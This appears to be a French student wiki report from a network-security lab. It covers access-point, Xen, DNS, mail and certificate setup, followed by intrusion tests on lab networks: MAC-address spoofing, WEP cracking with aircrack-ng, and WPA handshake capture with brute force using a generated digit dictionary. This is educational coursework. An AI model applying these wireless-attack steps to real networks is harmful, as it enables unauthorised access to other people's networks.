&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
apres Quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23138</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23138"/>
				<updated>2015-11-23T14:57:09Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
